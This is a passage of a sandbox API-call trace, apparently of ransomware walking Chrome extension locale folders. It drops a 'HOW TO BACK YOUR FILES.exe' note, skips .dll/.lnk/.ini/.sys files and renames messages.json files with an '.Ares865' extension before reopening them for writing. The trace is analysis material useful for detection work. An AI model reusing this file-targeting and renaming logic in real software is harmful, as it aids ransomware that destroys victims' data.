(lpString1="messages.json", lpString2=".sys") returned 1 [0100.515] lstrlenW (lpString="messages.json") returned 13 [0100.515] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.Ares865") returned 169 [0100.515] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.517] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15965) returned 1 [0100.520] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu" [0100.520] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu" [0100.520] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.521] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.521] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.521] GetLastError () returned 0x0 [0100.522] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83496410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e195760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e195760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.522] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.522] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.522] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.522] lstrlenW (lpString="messages.json") returned 13 [0100.522] lstrlenW (lpString="Ares865") returned 7 [0100.522] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.522] lstrlenW (lpString=".dll") returned 4 [0100.522] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.522] lstrlenW (lpString=".lnk") returned 4 [0100.522] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.522] lstrlenW (lpString=".ini") returned 4 [0100.522] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.522] lstrlenW (lpString=".sys") returned 4 [0100.522] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.522] lstrlenW (lpString="messages.json") returned 13 [0100.522] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.Ares865") returned 169 [0100.523] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.524] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16596) returned 1 [0100.528] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr" [0100.528] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr" [0100.528] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.528] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.529] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.530] GetLastError () returned 0x0 [0100.530] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.530] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8348c7d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e195760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e195760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.530] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.530] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.530] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.530] lstrlenW (lpString="messages.json") returned 13 [0100.530] lstrlenW (lpString="Ares865") returned 7 [0100.530] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.530] lstrlenW (lpString=".dll") returned 4 [0100.530] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.530] lstrlenW (lpString=".lnk") returned 4 [0100.530] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.530] lstrlenW (lpString=".ini") returned 4 [0100.530] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.530] lstrlenW (lpString=".sys") returned 4 [0100.530] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.531] lstrlenW (lpString="messages.json") returned 13 [0100.531] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.Ares865") returned 169 [0100.531] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.532] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16370) returned 1 [0100.536] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi" [0100.536] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi" [0100.536] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.536] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.537] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.537] GetLastError () returned 0x0 [0100.537] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.538] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834852a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e195760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e195760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.538] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.538] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.538] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.538] lstrlenW (lpString="messages.json") returned 13 [0100.538] lstrlenW (lpString="Ares865") returned 7 [0100.538] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.538] lstrlenW (lpString=".dll") returned 4 [0100.538] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.538] lstrlenW (lpString=".lnk") returned 4 [0100.538] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.538] lstrlenW (lpString=".ini") returned 4 [0100.538] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.538] lstrlenW (lpString=".sys") returned 4 [0100.538] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.538] lstrlenW (lpString="messages.json") returned 13 [0100.538] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.Ares865") returned 169 [0100.538] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.540] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20727) returned 1 [0100.543] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu" [0100.543] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu" [0100.543] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.543] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.544] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.544] GetLastError () returned 0x0 [0100.544] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.544] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8347dd70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e1bb8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e1bb8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.545] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.545] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.545] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.545] lstrlenW (lpString="messages.json") returned 13 [0100.545] lstrlenW (lpString="Ares865") returned 7 [0100.545] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.545] lstrlenW (lpString=".dll") returned 4 [0100.545] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.545] lstrlenW (lpString=".lnk") returned 4 [0100.545] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.545] lstrlenW (lpString=".ini") returned 4 [0100.545] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.545] lstrlenW (lpString=".sys") returned 4 [0100.545] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.545] lstrlenW (lpString="messages.json") returned 13 [0100.545] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.Ares865") returned 169 [0100.545] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.546] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.547] GetFileSizeEx (in: 